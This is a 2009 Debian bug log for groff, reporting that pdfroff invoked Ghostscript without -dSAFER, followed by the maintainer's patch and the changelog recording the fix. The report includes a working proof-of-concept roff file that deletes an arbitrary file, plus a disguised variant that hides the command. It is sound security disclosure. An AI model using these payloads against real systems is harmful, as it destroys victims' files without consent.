Debian Bug report logs - #538338
groff: pdfroff invokes gs insecurely (without -dSAFER)

version graph

Package: groff; Maintainer for groff is Colin Watson <cjwatson@debian.org>; Source for groff is src:groff.

Reported by: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>

Date: Fri, 24 Jul 2009 22:21:01 UTC

Severity: grave

Tags: security

Found in version groff/1.20.1-4

Fixed in version groff/1.20.1-5

Done: Colin Watson <cjwatson@debian.org>

Bug is archived. No further changes may be made.

Forwarded to bug-groff@gnu.org

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>:
Bug#538338; Package groff. (Fri, 24 Jul 2009 22:21:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>. (Fri, 24 Jul 2009 22:21:04 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: groff: pdfroff invokes gs insecurely (without -dSAFER)
Date: Fri, 24 Jul 2009 22:17:15 +0000
[Message part 1 (text/plain, inline)]
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
[signature.asc (application/pgp-signature, inline)]

Reply sent to Colin Watson <cjwatson@debian.org>:
You have marked Bug as forwarded. (Sat, 25 Jul 2009 08:36:05 GMT) Full text and rfc822 format available.

Message #8 received at 538338-forwarded@bugs.debian.org (full text, mbox):

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org
Cc: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 25 Jul 2009 09:32:38 +0100
[Message part 1 (text/plain, inline)]
groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
do so here?

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]
[Message part 2 (message/rfc822, inline)]
From: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)
Date: Fri, 24 Jul 2009 22:17:15 +0000
[Message part 3 (text/plain, inline)]
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
[signature.asc (application/pgp-signature, inline)]

Added tag(s) patch. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 09 Aug 2009 14:18:03 GMT) Full text and rfc822 format available.

Removed tag(s) patch. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 09 Aug 2009 14:18:05 GMT) Full text and rfc822 format available.

Message #13 received at 538338-forwarded@bugs.debian.org (full text, mbox):

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org, "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: Re: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 15 Aug 2009 08:59:08 +0100
On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> do so here?

I'm applying this patch to the Debian package. Please consider it?

=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh	2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
   $SAY >&2 $n "Writing PDF output ..$c"
   if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
   then
-    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
       -sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
 
   elif test -n "$PDF_OUTPUT"

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]




Message #14 received at 538338-forwarded@bugs.debian.org (full text, mbox):

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org, "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: Re: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 15 Aug 2009 09:01:28 +0100
On Sat, Aug 15, 2009 at 08:59:08AM +0100, Colin Watson wrote:
> On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> > groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> > do so here?
> 
> I'm applying this patch to the Debian package. Please consider it?

Or, in fact, this patch, which adjusts the documentation too.

=== modified file 'contrib/pdfmark/pdfroff.man'
--- contrib/pdfmark/pdfroff.man	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.man	2009-08-15 08:00:24 +0000
@@ -521,7 +521,7 @@ defaults to
 .IP
 .I
 .ad l
-.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-sDEVICE=pdfwrite \-sOutputFile=\-
+.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-dSAFER \-sDEVICE=pdfwrite \-sOutputFile=\-
 .ad
 .RE
 .

=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh	2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
   $SAY >&2 $n "Writing PDF output ..$c"
   if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
   then
-    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
       -sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
 
   elif test -n "$PDF_OUTPUT"

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]




Reply sent to Colin Watson <cjwatson@debian.org>:
You have taken responsibility. (Sat, 15 Aug 2009 10:30:09 GMT) Full text and rfc822 format available.

Notification sent to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
Bug acknowledged by developer. (Sat, 15 Aug 2009 10:30:10 GMT) Full text and rfc822 format available.

Message #19 received at 538338-close@bugs.debian.org (full text, mbox):

From: Colin Watson <cjwatson@debian.org>
To: 538338-close@bugs.debian.org
Subject: Bug#538338: fixed in groff 1.20.1-5
Date: Sat, 15 Aug 2009 10:04:46 +0000
Source: groff
Source-Version: 1.20.1-5

We believe that the bug you reported is fixed in the latest version of
groff, which is due to be installed in the Debian FTP archive:

groff-base_1.20.1-5_i386.deb
  to pool/main/g/groff/groff-base_1.20.1-5_i386.deb
groff_1.20.1-5.diff.gz
  to pool/main/g/groff/groff_1.20.1-5.diff.gz
groff_1.20.1-5.dsc
  to pool/main/g/groff/groff_1.20.1-5.dsc
groff_1.20.1-5_i386.deb
  to pool/main/g/groff/groff_1.20.1-5_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538338@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated groff package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 15 Aug 2009 09:01:47 +0100
Source: groff
Binary: groff-base groff
Architecture: source i386
Version: 1.20.1-5
Distribution: unstable
Urgency: low
Maintainer: Colin Watson <cjwatson@debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description: 
 groff      - GNU troff text-formatting system
 groff-base - GNU troff text-formatting system (base system components)
Closes: 538330 538338 541019 541621
Changes: 
 groff (1.20.1-5) unstable; urgency=low
 .
   * Upgrade to debhelper v7. (There's still lots of complexity here, so no
     dh(1).)
   * Remove Fumitoshi UKAI from Uploaders, with thanks for his previous work.
     Just shout if you want to be added back (closes: #541019).
   * Unset IFS at nroff startup (closes: #541621).
   * Patch from Openwall to fix temporary file handling vulnerabilities in
     pdfroff (closes: #538330).
   * Use -dSAFER when calling gs from pdfroff (thanks, brian m. carlson;
     closes: #538338).
Checksums-Sha1: 
 07d34cdf3f9a41ac8f80e7b38861afd2a4332bc1 1258 groff_1.20.1-5.dsc
 afc572adbb7f9c762c50048ad3eec5cd1952f3ef 41184 groff_1.20.1-5.diff.gz
 89ee0590a202dca5c08415edafad39d7224a4375 1103698 groff-base_1.20.1-5_i386.deb
 d0a0c97b9156d9be0ae0d19af004ecf08cd95601 3512134 groff_1.20.1-5_i386.deb
Checksums-Sha256: 
 6d7fe33055e63798e631cbb0208f57be1affd53616cd525644263c7bd0270a9d 1258 groff_1.20.1-5.dsc
 ab37002d146cb29d907ad8097c2620e1e63c699aaed1f394bd032b7ab8625fa6 41184 groff_1.20.1-5.diff.gz
 01003d22439094286fdcf1c5ef036ba2a825215ef816e9939a2f944aa9301c6e 1103698 groff-base_1.20.1-5_i386.deb
 0b0b8fec29f42590ef2bb1f90e36fe1db18974152abe1f68824ac40ea5c254db 3512134 groff_1.20.1-5_i386.deb
Files: 
 db341bf62664c0afefd71016c9cc3888 1258 text important groff_1.20.1-5.dsc
 3bfaace1000bf8687ec8d6c02c84b1e6 41184 text important groff_1.20.1-5.diff.gz
 a93b5459d35d5bb1c522642a18bca234 1103698 text important groff-base_1.20.1-5_i386.deb
 e4558537f026c6d0db872a5c8efa6a95 3512134 text optional groff_1.20.1-5_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Colin Watson <cjwatson@debian.org> -- Debian developer

iD8DBQFKhm6T9t0zAhD6TNERAmwQAJ4uNNVsSBiTzKXdhJ5OPU/LXbqSWwCbBbJn
XTXdB9uhIGw+9ivXuNSpnIA=
=fTmN
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Wed, 16 Sep 2009 07:34:45 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Apr 24 07:54:47 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.